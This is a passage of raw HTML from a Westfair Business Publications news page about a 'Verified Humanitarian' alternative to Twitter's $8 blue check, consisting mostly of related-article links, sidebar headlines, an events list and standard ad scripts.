creepy villain who gets badly killed at the end of each film.</div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span class="td-page-meta" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Phil Hall"><meta itemprop="url" content="https://westfaironline.com/author/philhall/"></span><meta itemprop="datePublished" content="2022-11-16T05:01:10-05:00"><meta itemprop="dateModified" content="2022-11-12T21:42:15-05:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://westfaironline.com/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/"/><span class="td-page-meta" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span class="td-page-meta" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://westfaironline.com/wp-content/uploads/2020/09/westfair.jpg"></span><meta itemprop="name" content="Westfair Communications"></span><meta itemprop="headline " content="New &#039;Verified Humanitarian&#039; campaign offers alternative outlet for Twitter&#039;s $8 blue check"><span class="td-page-meta" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://westfaironline.com/wp-content/uploads/2022/11/loaf-g04efa96c4_1920-scaled.jpg"><meta itemprop="width" content="1200"><meta itemprop="height" content="634"></span>        </footer>

    </article> <!-- /.post -->

    <script>var block_tdi_4 = new tdBlock();
block_tdi_4.id = "tdi_4";
block_tdi_4.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"tdi_4","td_column_number":3,"block_type":"td_block_related_posts","live_filter_cur_post_id":155786,"live_filter_cur_post_author":"3310","block_template_id":"","header_color":"","ajax_pagination_infinite_stop":"","offset":"","td_ajax_preloading":"","td_filter_default_txt":"","td_ajax_filter_ids":"","el_class":"","color_preset":"","border_top":"","css":"","tdc_css":"","tdc_css_class":"tdi_4","tdc_css_class_style":"tdi_4_rand_style"}';
block_tdi_4.td_column_number = "3";
block_tdi_4.block_type = "td_block_related_posts";
block_tdi_4.post_count = "3";
block_tdi_4.found_posts = "1826";
block_tdi_4.header_color = "";
block_tdi_4.ajax_pagination_infinite_stop = "";
block_tdi_4.max_num_pages = "609";
tdBlocksArray.push(block_tdi_4);
</script><div class="td_block_wrap td_block_related_posts tdi_4 td_with_ajax_pagination td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_4" ><h4 class="td-related-title"><a id="tdi_5" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="tdi_4" href="#">RELATED ARTICLES</a><a id="tdi_6" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="tdi_4" href="#">MORE FROM AUTHOR</a></h4><div id=tdi_4 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://westfaironline.com/food-beverage/stamfords-american-beverage-corp-acquires-poppilu-lemonade-brand/" rel="bookmark" class="td-image-wrap " title="Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand" ><img class="entry-thumb" src="" alt="" title="Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/poppil-striped-web-banner-238x178.jpg"  width="238" height="178" /></a></div>                <a href="https://westfaironline.com/category/fairfield/" class="td-post-category">Fairfield</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/food-beverage/stamfords-american-beverage-corp-acquires-poppilu-lemonade-brand/" rel="bookmark" title="Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand">Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://westfaironline.com/food-beverage/veteran-owned-ways-energy-debuts-energy-drink-line/" rel="bookmark" class="td-image-wrap " title="Veteran-owned Ways Energy debuts energy drink line" ><img class="entry-thumb" src="" alt="" title="Veteran-owned Ways Energy debuts energy drink line" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/ways-energy-238x178.jpg"  width="238" height="178" /></a></div>                <a href="https://westfaironline.com/category/food-beverage/" class="td-post-category">Food &amp; Beverage</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/food-beverage/veteran-owned-ways-energy-debuts-energy-drink-line/" rel="bookmark" title="Veteran-owned Ways Energy debuts energy drink line">Veteran-owned Ways Energy debuts energy drink line</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="https://westfaironline.com/food-beverage/fabrizia-lemon-baking-co-releases-limoncello-baked-goods-holiday-gift-boxes/" rel="bookmark" class="td-image-wrap " title="Fabrizia Lemon Baking Co. releases limoncello baked goods holiday gift boxes" ><img class="entry-thumb" src="" alt="" title="Fabrizia Lemon Baking Co. releases limoncello baked goods holiday gift boxes" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/Fabrizia_Grande_Holiday_Cheer_Gift_Box-238x178.jpg"  width="238" height="178" /></a></div>                <a href="https://westfaironline.com/category/food-beverage/" class="td-post-category">Food &amp; Beverage</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/food-beverage/fabrizia-lemon-baking-co-releases-limoncello-baked-goods-holiday-gift-boxes/" rel="bookmark" title="Fabrizia Lemon Baking Co. releases limoncello baked goods holiday gift boxes">Fabrizia Lemon Baking Co. releases limoncello baked goods holiday gift boxes</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" aria-label="prev-page" id="prev-page-tdi_4" data-td_block_id="tdi_4"><i class="td-next-prev-icon td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" aria-label="next-page" id="next-page-tdi_4" data-td_block_id="tdi_4"><i class="td-next-prev-icon td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->
    <div class="comments" id="comments">
        	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/food-beverage/new-verified-humanitarian-campaign-offers-alternative-outlet-for-twitters-8-blue-check/#respond" style="display:none;">Cancel reply</a></small></h3><form action="https://westfaironline.com/wp-comments-post.php?wpe-comment-post=westfairsite" method="post" id="commentform" class="comment-form" novalidate><div class="clearfix"></div>
            <div class="comment-form-input-wrap td-form-comment">
                <textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
                <div class="td-warning-comment">Please enter your comment!</div>
            </div><div class="comment-form-input-wrap td-form-author">
			            <input class="" id="author" name="author" placeholder="Name:*" type="text" value="" size="30"  aria-required='true' />
			            <div class="td-warning-author">Please enter your name here</div>
			         </div>
<div class="comment-form-input-wrap td-form-email">
			            <input class="" id="email" name="email" placeholder="Email:*" type="text" value="" size="30"  aria-required='true' />
			            <div class="td-warning-email-error">You have entered an incorrect email address!</div>
			            <div class="td-warning-email">Please enter your email address here</div>
			         </div>
<div class="comment-form-input-wrap td-form-url">
			            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" />
                     </div>
<p class="comment-form-cookies-consent"><input id="wp-comment-cookies-consent" name="wp-comment-cookies-consent" type="checkbox" value="yes" /><label for="wp-comment-cookies-consent">Save my name, email, and website in this browser for the next time I comment.</label></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='155786' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="c0dbfe01c0" /></p><p style="display: none !important;"><label>&#916;<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js" value="34"/><script>document.getElementById( "ak_js_1" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form>	</div><!-- #respond -->
	    </div> <!-- /.content -->
                                </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <div class="td_block_wrap td_block_7 td_block_widget tdi_7 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_7" ><script>var block_tdi_7 = new tdBlock();
block_tdi_7.id = "tdi_7";
block_tdi_7.atts = '{"custom_title":"LATEST NEWS","custom_url":"","header_text_color":"#","header_color":"#","border_top":"","color_preset":"","post_ids":"-155786","category_id":"19035","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","sort":"","limit":"8","offset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","ajax_pagination":"","ajax_pagination_infinite_stop":"","class":"td_block_widget tdi_7","block_type":"td_block_7","separator":"","title_tag":"","block_template_id":"","m6_tl":"","m6_title_tag":"","show_modified_date":"","video_popup":"","video_rec":"","video_rec_title":"","show_vid_t":"block","el_class":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","m6f_title_font_header":"","m6f_title_font_title":"Article title","m6f_title_font_settings":"","m6f_title_font_family":"","m6f_title_font_size":"","m6f_title_font_line_height":"","m6f_title_font_style":"","m6f_title_font_weight":"","m6f_title_font_transform":"","m6f_title_font_spacing":"","m6f_title_":"","m6f_cat_font_title":"Article category tag","m6f_cat_font_settings":"","m6f_cat_font_family":"","m6f_cat_font_size":"","m6f_cat_font_line_height":"","m6f_cat_font_style":"","m6f_cat_font_weight":"","m6f_cat_font_transform":"","m6f_cat_font_spacing":"","m6f_cat_":"","m6f_meta_font_title":"Article meta info","m6f_meta_font_settings":"","m6f_meta_font_family":"","m6f_meta_font_size":"","m6f_meta_font_line_height":"","m6f_meta_font_style":"","m6f_meta_font_weight":"","m6f_meta_font_transform":"","m6f_meta_font_spacing":"","m6f_meta_":"","css":"","tdc_css":"","td_column_number":1,"tdc_css_class":"tdi_7","tdc_css_class_style":"tdi_7_rand_style"}';
block_tdi_7.td_column_number = "1";
block_tdi_7.block_type = "td_block_7";
block_tdi_7.post_count = "8";
block_tdi_7.found_posts = "15887";
block_tdi_7.header_color = "#";
block_tdi_7.ajax_pagination_infinite_stop = "";
block_tdi_7.max_num_pages = "1986";
tdBlocksArray.push(block_tdi_7);
</script><h4 class="block-title"><span class="td-pulldown-size">LATEST NEWS</span></h4><div id=tdi_7 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/courts/rye-homeowner-demands-120000-to-replace-defective-windows-and-doors/" rel="bookmark" class="td-image-wrap " title="Rye homeowner demands $120,000 to replace defective windows and doors" ><img class="entry-thumb" src="" alt="" title="Rye homeowner demands $120,000 to replace defective windows and doors" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/Screen-Shot-2022-11-15-at-12.18.51-PM-100x75.png"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/courts/rye-homeowner-demands-120000-to-replace-defective-windows-and-doors/" rel="bookmark" title="Rye homeowner demands $120,000 to replace defective windows and doors">Rye homeowner demands $120,000 to replace defective windows and doors</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T12:21:46-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/courts/white-plains-project-stalled-by-blocked-access-for-scaffolding/" rel="bookmark" class="td-image-wrap " title="White Plains project stalled by blocked access for scaffolding" ><img class="entry-thumb" src="" alt="" title="White Plains project stalled by blocked access for scaffolding" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/Chatterton-Hill-project-100x75.png"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/courts/white-plains-project-stalled-by-blocked-access-for-scaffolding/" rel="bookmark" title="White Plains project stalled by blocked access for scaffolding">White Plains project stalled by blocked access for scaffolding</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T12:02:51-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/management/sema4-cuts-500-jobs-closes-stamford-laboratory/" rel="bookmark" class="td-image-wrap " title="Sema4 cuts 500 jobs, closes Stamford laboratory" ><img class="entry-thumb" src="" alt="" title="Sema4 cuts 500 jobs, closes Stamford laboratory" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/01/sema4-100x75.jpg"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/management/sema4-cuts-500-jobs-closes-stamford-laboratory/" rel="bookmark" title="Sema4 cuts 500 jobs, closes Stamford laboratory">Sema4 cuts 500 jobs, closes Stamford laboratory</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T09:41:06-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/government/ny-and-ct-in-settlement-with-google-over-location-tracking-data/" rel="bookmark" class="td-image-wrap " title="NY and CT in settlement with Google over location tracking data" ><img class="entry-thumb" src="" alt="" title="NY and CT in settlement with Google over location tracking data" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/google-76517_1280-100x75.png"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/government/ny-and-ct-in-settlement-with-google-over-location-tracking-data/" rel="bookmark" title="NY and CT in settlement with Google over location tracking data">NY and CT in settlement with Google over location tracking data</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T09:37:24-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/mergers-a-acquisitions/united-rentals-acquires-ahern-rentals-for-2b/" rel="bookmark" class="td-image-wrap " title="United Rentals acquires Ahern Rentals for $2B" ><img class="entry-thumb" src="" alt="united rentals" title="United Rentals acquires Ahern Rentals for $2B" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2018/10/United_Rentals-100x75.jpg"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/mergers-a-acquisitions/united-rentals-acquires-ahern-rentals-for-2b/" rel="bookmark" title="United Rentals acquires Ahern Rentals for $2B">United Rentals acquires Ahern Rentals for $2B</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T09:32:08-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/food-beverage/stamfords-american-beverage-corp-acquires-poppilu-lemonade-brand/" rel="bookmark" class="td-image-wrap " title="Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand" ><img class="entry-thumb" src="" alt="" title="Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/poppil-striped-web-banner-100x75.jpg"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/food-beverage/stamfords-american-beverage-corp-acquires-poppilu-lemonade-brand/" rel="bookmark" title="Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand">Stamford&#8217;s American Beverage Corp. acquires Poppilu lemonade brand</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T09:29:10-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/health-care/hartford-healthcare-opens-mens-health-facility-in-fairfield/" rel="bookmark" class="td-image-wrap " title="Hartford HealthCare opens men&#8217;s health facility in Fairfield" ><img class="entry-thumb" src="" alt="" title="Hartford HealthCare opens men&#8217;s health facility in Fairfield" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/1262-post-rd-fairfield-100x75.jpg"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/health-care/hartford-healthcare-opens-mens-health-facility-in-fairfield/" rel="bookmark" title="Hartford HealthCare opens men&#8217;s health facility in Fairfield">Hartford HealthCare opens men&#8217;s health facility in Fairfield</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T09:22:58-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack ">
            
            <div class="td-module-thumb"><a href="https://westfaironline.com/arts-leisure/photography-center-the-capa-space-to-open-in-yorktown/" rel="bookmark" class="td-image-wrap " title="Photography center The Capa Space to open in Yorktown" ><img class="entry-thumb" src="" alt="" title="Photography center The Capa Space to open in Yorktown" data-type="image_tag" data-img-url="https://westfaironline.com/wp-content/uploads/2022/11/The-Capa-Space-photo-100x75.jpg"  width="100" height="75" /></a></div>
        <div class="item-details">

            <h3 class="entry-title td-module-title"><a href="https://westfaironline.com/arts-leisure/photography-center-the-capa-space-to-open-in-yorktown/" rel="bookmark" title="Photography center The Capa Space to open in Yorktown">Photography center The Capa Space to open in Yorktown</a></h3>            <div class="meta-info">
                                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2022-11-15T09:13:13-05:00" >November 15, 2022</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><!-- /7467761/Combined_Top_300X250 -->
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/7467761/Combined_Top_300X250', [300, 250], 'div-gpt-ad-1637527161854-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>

<!-- /7467761/Combined_Top_300X250 -->
<div id='div-gpt-ad-1637527161854-0' style='min-width: 300px; min-height: 250px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1637527161854-0'); });
  </script>
</div>
</div></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget">	<!-- combined middle -->
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/7467761/Combined_Middle_300X250', [300, 250], 'div-gpt-ad-1637526428658-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>

<!-- /7467761/Combined_Middle_300X250 -->
<div id='div-gpt-ad-1637526428658-0' style='min-width: 300px; min-height: 250px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1637526428658-0'); });
  </script>
</div></div></aside><aside class="widget_text td_block_template_1 widget widget_custom_html"><div class="textwidget custom-html-widget"><!-- --------combined bottom----------->

<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/7467761/Combined_ads_300X250', [300, 250], 'div-gpt-ad-1637527324857-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<!-- /7467761/Combined_ads_300X250 -->
<div id='div-gpt-ad-1637527324857-0' style='min-width: 300px; min-height: 250px;'>
  <script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1637527324857-0'); });
  </script>
</div></div></aside><aside class="td_block_template_1 widget widget_sc_event_list_widget"><h4 class="block-title"><span>BUSINESS EVENTS</span></h4><div id="sc_list_wrap"><ul class="sc_events_list"><li class="sc_event post-155236 type-sc_event status-publish "><a href="https://westfaironline.com/events/trivia-night-at-coalhouse-pizza-stamford/" class="sc_event_link"><span class="sc_event_title">Trivia Night at Coalhouse Pizza &#8211; Stamford</span></a><span class="sc_event_date"><time datetime="2022-11-16+0000" title="2022-11-16+0000" data-timezone="floating">November 16, 2022</time></span><br class="clear"></li><li class="sc_event post-154636 type-sc_event status-publish "><a href="https://westfaironline.com/events/entrepreneurial-womens-club-monthly-meeting/" class="sc_event_link"><span class="sc_event_title">Entrepreneurial Women’s Club Monthly Meeting</span></a><span class="sc_event_date"><time datetime="2022-11-17+0000" title="2022-11-17+0000" data-timezone="floating">November 17, 2022</time></span><br class="clear"></li><li class="sc_event post-153231 type-sc_event status-publish "><a href="https://westfaironline.com/events/2022-milli-gen-z-awards/" class="sc_event_link"><span class="sc_event_title">2022 Milli + Gen Z Awards</span></a><span class="sc_event_date"><time datetime="2022-11-17+0000" title="2022-11-17+0000" data-timezone="floating">November 17, 2022</time></span><br class="clear"></li><li class="sc_event post-155041 type-sc_event status-publish "><a href="https://westfaironline.com/events/latin-rock-benefit-concert/" class="sc_event_link"><span class="sc_event_title">Latin Rock Benefit Concert</span></a><span class="sc_event_date"><time datetime="2022-11-17+0000" title="2022-11-17+0000" data-timezone="floating">November 17, 2022</time></span><br class="clear"></li><li class="sc_event post-154649 type-sc_event status-publish "><a href="https://westfaironline.com/events/business-finance-leadership-in-law-cocktail-party/" class="sc_event_link"><span class="sc_event_title">Business &#038; Finance / Leadership in Law Cocktail Party</span></a><span class="sc_event_date"><time datetime="2022-11-17+0000" title="2022-11-17+0000" data-timezone="floating">November 17, 2022</time></span><br class="clear"></li><li class="sc_event post-154663 type-sc_event status-publish "><a href="https://westfaironline.com/events/holiday-boutique-in-the-barn/" class="sc_event_link"><span class="sc_event_title">Holiday Boutique in the Barn</span></a><span class="sc_event_date"><time datetime="2022-11-18+0000" title="2022-11-18+0000" data-timezone="floating">November 18, 2022</time></span><br class="clear"></li><li class="sc_event post-154613 type-sc_event status-publish "><a href="https://westfaironline.com/events/friends-of-the-fairfield-public-library-book-sale/" class="sc_event_link"><span class="sc_event_title">Friends of the Fairfield Public Library Book Sale</span></a><span class="sc_event_date"><time datetime="2022-11-18+0000" title="2022-11-18+0000" data-timezone="floating">November 18, 2022</time></span><br class="clear"></li><li class="sc_event post-154705 type-sc_event status-publish "><a href="https://westfaironline.com/events/creative-community-friday/" class="sc_event_link"><span class="sc_event_title">Creative Community Friday</span></a><span class="sc_event_date"><time datetime="2022-11-18+0000" title="2022-11-18+0000" data-timezone="floating">November 18, 2022</time></span><br class="clear"></li></ul></div></aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div>
</div> <!-- /.td-container -->

    <!-- Instagram -->
    

    <!-- Footer -->
    <div class="td-footer-container td-container td-footer-template-10">
    
    <div class="footer-social-wrap td-social-style2 td-footer-full">
        
            <span class="td-social-icon-wrap">
                <a target="_blank" href="https://www.facebook.com/WestfairOnline" title="Facebook">
                    <i class="td-icon-font td-icon-facebook"></i>
                    <span class="td-social-name">Facebook</span>
                </a>
            </span>
            <span class="td-social-icon-wrap">
                <a target="_blank" href="https://www.instagram.com/westfaironline/" title="Instagram">
                    <i class="td-icon-font td-icon-instagram"></i>
                    <span class="td-social-name">Instagram</span>
                </a>
            </span>
            <span class="td-social-icon-wrap">
                <a target="_blank" href="https://www.linkedin.com/company/westfair-business-publications" title="Linkedin">
                    <i class="td-icon-font td-icon-linkedin"></i>
                    <span class="td-social-name">Linkedin</span>
                </a>
            </span>
            <span class="td-social-icon-wrap">
                <a target="_blank" href="https://twitter.com/westfaironline" title="Twitter">
                    <i class="td-icon-font td-icon-twitter"></i>
                    <span class="td-social-name">Twitter</span>
                </a>
            </span>
            <span class="td-social-icon-wrap">
                <a target="_blank" href="https://www.youtube.com/user/thewagmag" title="Youtube">
                    <i class="td-icon-font td-icon-youtube"></i>
                    <span class="td-social-name">Youtube</span>
                </a>
            </span>    </div>
</div>

    <!-- Sub Footer -->
        <div class="td-sub-footer-container td-container td-container-border ">
        <div class="td-pb-row">
            <div class="td-pb-span8 td-sub-footer-menu">
                <div class="td-pb-padding-side">
                    <div class="menu-footer-menu-container"><ul id="menu-footer-menu" class="td-subfooter-menu"><li id="menu-item-87775" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-87775"><a href="https://westfaironline.com/about-us/">ABOUT</a></li>
<li id="menu-item-152822" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-152822"><a href="https://westfaironline.com/members/">MEMBERS</a></li>
<li id="menu-item-87779" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-87779"><a href="https://westfaironline.com/advertise/">ADVERTISE</a></li>
<li id="menu-item-87780" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-87780"><a href="https://westfaironline.com/contact/">CONTACT</a></li>
<li id="menu-item-115832" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-115832"><a href="https://westfaironline.com/terms-of-use/">Terms of Use</a></li>
</ul></div>                </div>
            </div>

            <div class="td-pb-span4 td-sub-footer-copy">
                <div class="td-pb-padding-side">
                    &copy; Copyright Westfair Business Publications                </div>
            </div>
        </div>
    </div>
    </div><!--close td-outer-container-->
</div><!--close td-outer-wrap-->

        <div id="mailchimp-top-bar" class="mctb mctb-sticky mctb-position-bottom mctb-big">
            <!-- Mailchimp Top Bar v1.5.5 - https://wordpress.org/plugins/mailchimp-top-bar/ -->
            <div class="mctb-bar" >
                <form method="post" >
					                    <label class="mctb-label" for="mailchimp-top-bar__email">  Don't miss the stories that matter most. Sign up for our free newsletter.  </label>
					                    <input type="email" name="email"
                           placeholder="Email address"
                           class="mctb-email" required id="mailchimp-top-bar__email"/>
                    <input type="text" name="email_confirm" placeholder="Confirm your email" value="" autocomplete="off"
                           tabindex="-1" class="mctb-email-confirm"/>
					                    <input type="submit" value="Subscribe"
                           class="mctb-button"/>
					                    <input type="hidden" name="_mctb" value="1"/>
                    <input type="hidden" name="_mctb_no_js" value="1"/>
                    <input type="hidden" name="_mctb_timestamp" value="1668592879"/>
                </form>
				            </div>
            <!-- / Mailchimp Top Bar -->
        </div>
		

    <!--

        Theme: Newsmag by tagDiv.com 2022
        Version: 5.2.1 (rara)
        Deploy mode: deploy
        
        uid: 6374b4ef06006
    -->

    
<!-- Custom css from theme panel -->
<style type="text/css" media="screen">

/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 1200px) {
.adsense-120x600-left
        {
            position: fixed;
            top: 90px;
            left: calc((100% - 1280px) / 2);
        }
.adsense-120x600-right
        {
            position: fixed;
            top: 90px;
            right: calc((100% - 1280px) / 2);
        }
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (min-width: 768px) and (max-width: 1018px) {
.adsense-120x600-left
        {
            position: fixed;
            top: 90px;
            display:none;
        }
.adsense-120x600-right
        {
            position: fixed;
            top: 0;
            display:none;
        }
}


/* custom responsive css from theme panel (Advanced CSS) */
@media (max-width: 767px) {
.adsense-120x600-left
        {
            position: fixed;
            top: 0;
           display:none;
        }
.adsense-120x600-right
        {
            position: fixed;
            top: 0;
            display:none;
        }
}
</style>

<div class="td-container">:<div class="adsense-120x600-left"><a href="https://westfaironline.com/become-a-member" target="_blank">
